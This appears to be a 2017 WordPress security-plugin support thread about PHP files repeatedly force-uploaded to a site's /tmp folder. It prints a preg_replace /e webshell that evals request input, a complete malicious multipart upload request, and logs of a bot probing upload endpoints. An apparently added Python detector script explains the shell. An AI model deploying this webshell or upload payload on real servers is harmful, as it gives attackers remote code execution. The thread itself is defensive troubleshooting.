Malicious file uploaded to tmp directory


This topic contains 15 replies, has 3 voices, and was last updated by  AITpro Admin 9 months, 3 weeks ago.

Viewing 15 posts - 1 through 15 (of 16 total)
  • #33685

    x
    Participant

    I’m having some successful attacks on my server, and it’s running the current BPS version.
    For example, on Jul 15 20:22, a file ‘phpC7RCyS’ was uploaded into the /tmp folder under my website.
    This file contains:

    <?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['fuckyou4321']."')", "laterain testin9"); ?>984300

    Another file from the tmp directory (a few seconds later) contains the same information.
    From my httpd access file I see:

    [Sat Jul 15 20:22:56 2017] [error] [client 195.154.217.116] File does not exist: /var/www/theeldestgeek.com/web/wp-content/plugins/Login-wall-etgFB
    [Sat Jul 15 20:23:05 2017] [error] [client 195.154.217.116] client denied by server configuration: /var/www/theeldestgeek.com/web/wp-content/uploads/sfn.php
    [Sat Jul 15 20:23:06 2017] [error] [client 195.154.217.116] File does not exist: /var/www/theeldestgeek.com/web/wp-content/plugins/jquery-html5-file-upload

    It appears the sfn.php file was used (it appears at another time when another file was uploaded).
    BPS does not seem to have stopped it. What can this file DO, and should I be worried about it?

    thanks!

    #33690

    AITpro Admin
    Keymaster

    Do you have the BPS Pro Plugin Firewall activated? The BPS Pro Plugin Firewall blocks these types of Remote File upload attacks. If you have BPS free, then this BPS POST Attack Protection bonus custom code will also block these types of forced remote file upload attacks (eventually the POST Attack Protection code will be a full GUI feature in BPS, either 13.3 or 13.4): https://forum.ait-pro.com/forums/topic/post-request-protection-post-attack-protection-post-request-blocker/ See the method of this attack below. Once you have added the POST Attack Protection code, the next time an attack is blocked it will tell you which plugin or theme is being used/exploited in this attack.

    Method of attack: forced remote file upload by exploiting common security vulnerabilities in plugins or theme upload forms.
    Protection|Prevention: BPS Pro: Plugin Firewall. BPS free & Pro: BPS POST Attack Protection bonus custom code.

    [403 POST Request: January 14, 2017 12:25 pm]
    Event Code: PSBR-HPR
    Solution: http://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 195.154.250.248
    Host Name: mail.gimson.info
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass=
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
    REQUEST BODY: --(UploadBoundary)
    Content-Disposition: form-data; name="upload[]"; filename="sfn.php"
    Content-Type: text/php
    
    <?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['fuckyou4321']."')", "laterain testin9"); ?>984300
    --(UploadBoundary)
    Content-Disposition: form-data; name="cmd"
    
    upload
    --(UploadBoundary)
    Content-Disposition: form-data; name="target"
    
    l1_Lw
    --(UploadBoundary)
    Content-Disposition: form-data; name="html"
    
    1
    --(UploadBoundary)

    General Information about the PHP /tmp folder:
    The temporary directory used for storing files when doing file upload. Must be writable by whatever user PHP is running as. If not specified PHP will use the system’s default.

    The /tmp directory should have read, write and execute rights for everyone.

    Files will, by default be stored in the server’s default temporary directory, unless another location has been given with the upload_tmp_dir directive in php.ini. The server’s default directory can be changed by setting the environment variable TMPDIR in the environment in which PHP runs. Setting it using putenv() from within a PHP script will not work. This environment variable can also be used to make sure that other operations are working on uploaded files, as well.

    tmp files are uploaded via PHP’s HTTP POST upload mechanism. If the file is valid, it will be moved to the filename given by destination.

    If filename is not a valid upload file, then no action will occur, and move_uploaded_file() will return FALSE.

    If filename is a valid upload file, but cannot be moved for some reason, no action will occur, and move_uploaded_file() will return FALSE. Additionally, a warning will be issued.

    The file will be deleted from the temporary directory at the end of the request if it has not been moved away or renamed.

    The tmpfile() function creates a temporary file with a unique name in read-write (w+) mode and returns a file handle.
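
As an added illustration (not code from this thread or from BPS), the Python script below parses a multipart/form-data body like the REQUEST BODY in the log entry above and flags parts that carry server-side code. The sample body is constructed from that log entry, with the closing `--(UploadBoundary)--` delimiter added so it is well-formed; the signature patterns are my own heuristics. It also shows why the uploaded file matters: `preg_replace()` with the `/e` modifier evaluates the replacement string as PHP, and the replacement here is assembled to read `eval('<value of the fuckyou4321 request parameter>')`, so any GET, POST or cookie parameter of that name is executed as PHP once the file is reachable by URL; the split `"ev"."al"` string exists to evade simple searches for `eval(`. (The `/e` modifier was deprecated in PHP 5.5 and removed in PHP 7.0, where this call only raises a warning.)

```python
import re

# Constructed sample: the multipart body shown in the BPS Security Log entry above,
# with the closing "--boundary--" delimiter added so the body is well-formed.
BOUNDARY = "(UploadBoundary)"
WEBSHELL = '''<?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['fuckyou4321']."')", "laterain testin9"); ?>984300'''
SAMPLE_BODY = (
    "--(UploadBoundary)\r\n"
    'Content-Disposition: form-data; name="upload[]"; filename="sfn.php"\r\n'
    "Content-Type: text/php\r\n\r\n" + WEBSHELL + "\r\n"
    "--(UploadBoundary)\r\n"
    'Content-Disposition: form-data; name="cmd"\r\n\r\nupload\r\n'
    "--(UploadBoundary)\r\n"
    'Content-Disposition: form-data; name="target"\r\n\r\nl1_Lw\r\n'
    "--(UploadBoundary)\r\n"
    'Content-Disposition: form-data; name="html"\r\n\r\n1\r\n'
    "--(UploadBoundary)--\r\n"
)

DISPOSITION_PARAM_RE = re.compile(r'(\w+)="([^"]*)"')
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}
PHP_OPEN_TAG_RE = re.compile(r"<\?(php\b|=)", re.I)
# preg_replace() whose pattern ends in the /e modifier: PHP evaluates the replacement as code
PREG_E_MODIFIER_RE = re.compile(r"""preg_replace\s*\(\s*["'][^"']*/[a-z]*e[a-z]*["']""", re.I)
STRING_GLUE_RE = re.compile(r"""["']\s*\.\s*["']""")  # the "ev"."al" split used to hide eval
EVAL_RE = re.compile(r"\beval\s*\(", re.I)
REQUEST_INPUT_RE = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\b")


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into (headers, content) parts.

    Header names are lower-cased; the Content-Disposition parameters are also
    exposed as headers["name"] and headers["filename"] when present.
    """
    parts = []
    for chunk in body.split("--" + boundary):
        # each part is "\r\n<headers>\r\n\r\n<content>\r\n"; the closing delimiter leaves "--"
        if chunk.startswith("\r\n"):
            chunk = chunk[2:]
        if chunk.endswith("\r\n"):
            chunk = chunk[:-2]
        if chunk in ("", "--"):
            continue
        raw_headers, _, content = chunk.partition("\r\n\r\n")
        headers = {}
        for line in raw_headers.split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        for key, value in DISPOSITION_PARAM_RE.findall(headers.get("content-disposition", "")):
            headers[key.lower()] = value
        parts.append((headers, content))
    return parts


def classify_part(headers, content):
    """Return the reasons a part looks like a server-side code upload (empty list if none)."""
    reasons = []
    filename = headers.get("filename", "")
    extension = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if extension in EXECUTABLE_EXTENSIONS:
        reasons.append("executable extension ." + extension)
    if PHP_OPEN_TAG_RE.search(content):
        reasons.append("PHP open tag")
    if PREG_E_MODIFIER_RE.search(content):
        reasons.append("preg_replace /e modifier (replacement is evaluated as PHP)")
    # collapse "ev"."al"-style string concatenation before looking for eval(
    if EVAL_RE.search(STRING_GLUE_RE.sub("", content)):
        reasons.append("eval of a dynamic string")
    if REQUEST_INPUT_RE.search(content):
        reasons.append("executes attacker-supplied request input")
    return reasons


def find_code_uploads(body, boundary):
    """List every part of the body that classify_part() flags, with its form field and filename."""
    findings = []
    for headers, content in parse_multipart(body, boundary):
        reasons = classify_part(headers, content)
        if reasons:
            findings.append({
                "field": headers.get("name"),
                "filename": headers.get("filename"),
                "content_type": headers.get("content-type"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in find_code_uploads(SAMPLE_BODY, BOUNDARY):
        print(finding)
```

On this sample the only finding is the `upload[]` part (filename `sfn.php`) with every reason set; the three plain form fields (`cmd`, `target`, `html`) parse cleanly and are not flagged. The `Content-Type: text/php` the client sent is untrusted input, which is why the check keys on the filename extension and the content rather than on the declared type.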

    #33691

    x
    Participant

    I’ve done what you have suggested. Another annoying thing: any time I update a theme (I’m using Avada and they have a built-in patcher) I’m seeing files being quarantined! I assume by restoring them I’m restoring the UPDATED file, not the one before the update, right?

    I thought BPS was supposed to be able to handle these correctly?

    cdb.

    #33692

    AITpro Admin
    Keymaster

    AutoRestore Automation will automatically turn off AutoRestore, back up any new files and turn itself back on if you are updating or installing a theme from your WordPress Dashboard using the WordPress API, since your identity/user is known. If you are manually uploading files via FTP or remotely installing files from a remote location, then AutoRestore Automation will not be able to confirm your identity. See the AutoRestore|Quarantine Standard Procedural Steps when manually modifying or uploading files: http://forum.ait-pro.com/forums/topic/autorestore-quarantine-guide-read-me-first/#procedural-steps

    My guess would be that the Avada Theme built-in patcher does not hook into the WordPress API. ARQ Automation listens to the WordPress API for things like WordPress Automatic Updates, manual or Shiny WP Core, plugin and theme updates and installations. So if the Avada Theme built-in patcher does not hook into the WordPress API, then use the AutoRestore|Quarantine Standard Procedural Steps when manually modifying or uploading files.

    #33695

    x
    Participant

    I have the BPS Pro Firewall turned on but the attacks continue!

    [403 GET Request: July 22, 2017 - 1:53 am]
    BPS Pro: 13.2
    WP: 4.8
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 91.205.173.48
    Host Name: vm1.d-waste.eu
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: theeldestgeek.com
    REQUEST_URI: /wp-content/uploads/bb.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36
    
    [403 GET Request: July 22, 2017 - 5:19 am]
    BPS Pro: 13.2
    WP: 4.8
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 62.210.162.118
    Host Name: 62-210-162-118.rev.poneytelecom.eu
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/uploads/sfn.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
    
    [403 GET Request: July 22, 2017 - 5:19 am]
    BPS Pro: 13.2
    WP: 4.8
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 62.210.162.118
    Host Name: 62-210-162-118.rev.poneytelecom.eu
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/uploads/sfn.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
    
    [403 GET Request: July 22, 2017 - 5:19 am]
    BPS Pro: 13.2
    WP: 4.8
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 62.210.162.118
    Host Name: 62-210-162-118.rev.poneytelecom.eu
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/uploads/sfn.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
    
    [403 GET Request: July 22, 2017 - 5:19 am]
    BPS Pro: 13.2
    WP: 4.8
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 62.210.162.118
    Host Name: 62-210-162-118.rev.poneytelecom.eu
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/uploads/sfn.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
    
    [403 GET Request: July 22, 2017 - 5:19 am]
    BPS Pro: 13.2
    WP: 4.8
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 62.210.162.118
    Host Name: 62-210-162-118.rev.poneytelecom.eu
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/uploads/sfn.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
    
    [403 GET Request: July 22, 2017 - 6:26 pm]
    BPS Pro: 13.2
    WP: 4.8
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 79.168.231.184
    Host Name: a79-168-231-184.cpe.netcabo.pt
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /
    QUERY_STRING:
    HTTP_USER_AGENT: Wget/1.19.1 (linux-gnu)
    
    [405 HEAD Request: July 23, 2017 - 12:23 am]
    BPS Pro: 13.2
    WP: 4.8
    Event Code: BFHS-HEAD - HEAD Request Blocked
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 199.58.164.136
    Host Name: 199.58.164.136
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: HEAD
    HTTP_REFERER: http://uptime-gamma.net/www.theeldestgeek.com
    REQUEST_URI: /
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)
    
    [405 HEAD Request: July 23, 2017 - 12:53 am]
    BPS Pro: 13.2
    WP: 4.8
    Event Code: BFHS-HEAD - HEAD Request Blocked
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 120.76.114.201
    Host Name: 120.76.114.201
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: HEAD
    HTTP_REFERER:
    REQUEST_URI: /wp-login.php
    QUERY_STRING:
    HTTP_USER_AGENT:
    
    [405 HEAD Request: July 23, 2017 - 3:26 am]
    BPS Pro: 13.2
    WP: 4.8
    Event Code: BFHS-HEAD - HEAD Request Blocked
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 199.58.164.142
    Host Name: 199.58.164.142
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: HEAD
    HTTP_REFERER: http://uptime-alpha.net/eldestgeek.com
    REQUEST_URI: /
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)
    
    [405 HEAD Request: July 23, 2017 - 5:22 am]
    BPS Pro: 13.2
    WP: 4.8
    Event Code: BFHS-HEAD - HEAD Request Blocked
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 74.115.214.131
    Host Name: 74.115.214.131
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: HEAD
    HTTP_REFERER: http://uptime-delta.net/www.theeldestgeek.com
    REQUEST_URI: /
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)

    ----- and at the same time phpxxx files are created in the /tmp folder (and left):

    -rw------- 1 web8 client0 107 Jul 22 05:19 phpFMDo37
    -rw------- 1 web8 client0 107 Jul 22 05:19 phpI6hjTt
    -rw------- 1 web8 client0 107 Jul 22 05:20 phpIwIfO4
    -rw------- 1 web8 client0 107 Jul 22 05:20 phpJ9my36
    -rw------- 1 web8 client0 107 Jul 22 05:20 phpkQEeBD
    -rw------

    and these files all contain: <?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['fuckyou4321']."')", "laterain testin9"); ?>984300

    What’s going on, please??? Is this actually harming me?

    #33696

    rafaelmagic
    Participant

    Stuff is being blocked with 403 error codes. That is a good thing.

    Also it seems that UpTimeRobot is being blocked because you have to Allow HEAD requests.

    Now about your TMP files, change your Passwords. Check your Uploads folder for junk.

    Is your theme clean? Are you using plugins that are current?

    #33697

    AITpro Admin
    Keymaster

    What is happening is this:  BPS Pro UAEG is currently blocking the moved .php files (or at least any direct requests to .php files) in your WordPress /uploads folder from being accessible to the hacker.  So the hack is being stopped by UAEG and is not proceeding any further to hack your actual website or hosting account.  The Remote file uploads are still not being blocked and the files are being force uploaded to your /tmp folder and then automatically moved (or maybe not actually moved) to your WordPress /uploads folder, which is the normal process of handling PHP POST file uploads.

    Assuming the BPS Pro Plugin Firewall is working correctly on your website, the Remote file POST must be using an upload form that is not a Plugin upload form.  The upload form could be a Theme upload form or some other upload form somewhere else on your website.  Do these steps below:

    1. Go to the BPS htaccess File Editor page > click the Your Current Root htaccess File tab > scroll down in your Root htaccess file contents > copy your # WP REWRITE LOOP START htaccess code (see example below) into this BPS Root Custom Code text box: 8. CUSTOM CODE WP REWRITE LOOP START.
    2. Get the BPS POST Attack Protection code from here: https://forum.ait-pro.com/forums/topic/post-request-protection-post-attack-protection-post-request-blocker/ and copy and paste it below your #WP REWRITE LOOP START htaccess code that you just copied into BPS Custom Code.
    3. Click the Save Root Custom Code button.
    4. Go to the Security Modes page and click the Root folder BulletProof Mode Activate button.

    IMPORTANT Note: You should check all of your forms on your website (contact form, etc.) to see if any of them are being blocked by the POST Attack Protection code, and you will need to add whitelist rules in the BPS POST Attack Protection code to allow/whitelist those forms from being blocked by the POST Attack Protection code. Very important: If you whitelist a particular form (especially a form that is an upload form) and the /tmp file uploads start happening again, then you will have found the vulnerable upload form that the hacker is exploiting and you will need to figure out what you want to do next, i.e. delete or replace or fix/secure that form, etc.

    Example # WP REWRITE LOOP START htaccess code
    Note: Do not use this example code. Your WP Rewrite Loop start code may be different so use/copy your actual code.

    # WP REWRITE LOOP START
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    
    # The POST Attack Protection code will go below your WP Rewrite Loop start code here

    #33698

    AITpro Admin
    Keymaster

    Actually what would be better is to NOT check any of your forms on your website and let the hackerbot do another Remote POST file upload, which will be blocked and logged in your BPS Security Log file.  So that you will know exactly which form on your website has a vulnerability and that is being exploited in this attack.  Then decide what action you want to take next.  ie delete or replace or fix/secure that form.  After all hackerbot attacks have been stopped then you would want to check all other POST forms on your website to make sure they are not being blocked by the BPS POST Attack protection code and whitelist those forms using whitelist rules in the POST Attack Protection code.

    Also it is important to note that this attack is most likely automated using a Bot.  So since the Bot is seeing some partial success it is continuing to repeat the automated attack.  Once the POST Attack Protection code has been added and the Bot is blocked at the POST Remote file upload stage then the Bot will move on after X number of failed POST Remote file upload attempts and continue its automated attacks on other websites.

    #33748

    x
    Participant

    I have implemented the bonus code etc. – but the uploads continue!!!
    I keep finding these phpxxx files in the /tmp folder and nothing indicates to me WHAT is doing this or how to stop it.
    Clearly the posts continue, so I’m not blocking them, right?
    What are these actually DOING??? Is there any danger to my server??

    –snip–

    192.168.2.1 - - [29/Jul/2017:00:09:57 -0400] "POST /wp-cron.php?doing_wp_cron=1501301397.6621930599212646484375 HTTP/1.1" 200 191 "http://www.conciergecareva.com/wp-cron.php?doing_wp_cron=1501301397.6621930599212646484375" "WordPress/4.8; http://www.conciergecareva.com"
    69.197.145.178 - - [29/Jul/2017:00:38:06 -0400] "GET / HTTP/1.1" 301 249 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:09 -0400] "GET / HTTP/1.1" 200 737428 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:11 -0400] "POST /wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=c2ZuLnBocA%3D%3D&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d HTTP/1.1" 301 456 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:13 -0400] "GET /wp-content/plugins/sfn.php HTTP/1.1" 301 368 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    192.168.2.1 - - [29/Jul/2017:00:38:08 -0400] "POST /wp-cron.php?doing_wp_cron=1501303088.3894369602203369140625 HTTP/1.1" 200 191 "http://www.conciergecareva.com/wp-cron.php?doing_wp_cron=1501303088.3894369602203369140625" "WordPress/4.8; http://www.conciergecareva.com"
    69.197.145.178 - - [29/Jul/2017:00:38:14 -0400] "POST / HTTP/1.1" 200 737515 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:16 -0400] "GET /wp-content/uploads/sfn.php HTTP/1.1" 403 1493 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:17 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 389 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:19 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/sfn.php HTTP/1.1" 301 398 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:20 -0400] "GET /wp-content/plugins/revslider/sfn.php HTTP/1.1" 301 378 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:21 -0400] "POST /license.php HTTP/1.1" 500 39420 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:22 -0400] "POST /uploadify/uploadify.php?folder=/ HTTP/1.1" 500 40880 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:23 -0400] "POST /tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass= HTTP/1.1" 500 43800 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:24 -0400] "GET /sfn.php HTTP/1.1" 301 349 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:25 -0400] "POST /sites/all/libraries/elfinder/php/connector.minimal.php HTTP/1.1" 500 39420 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:26 -0400] "POST /wp-content/plugins/jquery-html5-file-upload/jquery-html5-file-upload.php HTTP/1.1" 301 414 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:27 -0400] "GET /wp-content/uploads/files/guest/sfn.php HTTP/1.1" 301 380 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:28 -0400] "POST /wp-content/plugins/woocommerce-product-options/includes/image-upload.php HTTP/1.1" 301 414 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:29 -0400] "GET /wp-content/uploads/2017/7/sfn.php HTTP/1.1" 301 375 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:30 -0400] "POST /modules/mod_simplefileuploadv1.3/elements/udd.php HTTP/1.1" 500 40880 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:31 -0400] "GET /?feed=rss2 HTTP/1.1" 301 352 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:32 -0400] "GET /feed/ HTTP/1.1" 200 2327 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:33 -0400] "GET /wp-login.php HTTP/1.1" 200 4610 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    69.197.145.178 - - [29/Jul/2017:00:38:34 -0400] "POST /wp-login.php HTTP/1.1" 200 4759 "-" "Mozilla/5.0 (compatible; MSIE 9.0;

    —snip
    And the files in my savefolder (under root):

    -rw------- 1 web64 client0 107 Jul 29 00:38 phpcTfQCh
    -rw------- 1 web64 client0 107 Jul 29 00:38 phpe558uP
    -rw------- 1 web64 client0 107 Jul 29 00:38 phpezZer5
    -rw------- 1 web64 client0 107 Jul 29 00:38 phpwiAEtT
    -rw------- 1 web64 client0 107 Jul 29 00:38 phpzcvBor

    —snip–
    So 5 files were uploaded successfully!
    And the contents (they all seem to be pretty much identical):
    <?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['fuckyou4321']."')", "laterain testin9"); ?>984300

    So my question is: what is this DOING?? And how can I really stop it?
    Clearly the culprit is 69.197.145.178, but what is he affecting? All I can do up to now is just move the php files out of the tmp folder.
    Some help would be MOST appreciated, as I really need to understand (and stop) what’s going on.
    Do you offer any paid onsite visits?

    thanks

    #33749

    AITpro Admin
    Keymaster

    Host:  Verizon Fios Business: http://fios.verizon.com/fios-business.html
    Server Type:  in-house:  Apache/2.2.15 (CentOS)
    Known Security Vulnerabilities Apache/2.2.15: https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-93077/Apache-Http-Server-2.2.15.html
    Offers Hosting:  Yes, offers hosting and website design/development to customers.

    Based on your Apache log entries the attacks are random POST attacks that follow typical Bot attack patterns attempting any/all possible exploits.  There is not one specific point of attack.  The POST attacks result in HTTP Status codes:  500 and 301 and not 200 OK.

    Logical guess based on the log entries:  There is a flaw or vulnerability with your Apache/2.2.15 (CentOS) build/compile/installation or your PHP server build/compile/installation that is allowing any/all file uploads to be uploaded to your /tmp folder no matter what the random attack vector is.  Or in other words, any/all attempts to upload files from any POST Remote file upload is allowing files to be uploaded to your /tmp folder.  That should obviously not be allowed to happen.  Only valid HTTP POST form uploads made using a POST Form should be allowed to upload files to a /tmp folder.

    Recommendations:  Check your httpd.conf and vhosts conf files for configuration mistakes and fix them.  Check your php.ini file directives for any configuration mistakes and fix them.  Upgrade your Apache/2.2.15 (CentOS)  to Apache 2.4.  Upgrade your PHP server to PHP7.

    #33752

    x
    Participant

    Thanks for the suggestions – but I am running ISPPROTECT (which is scanning the whole /var/www tree and is what is flagging these files) and I’m not seeing any other evidence of actual access or damage.

    Are these files dangerous? And what would they actually DO? Or are they just a nuisance, and I can just do a cron job and delete them all routinely?

    And surely I’m not the first person to see this happening? Why would such a HUGE flaw in either apache or php5 not be well known at this point???

    And would anyone here be able to maybe log in via ssh and help me track this nasty down? If so, what would the costs be?

    #33754

    AITpro Admin
    Keymaster

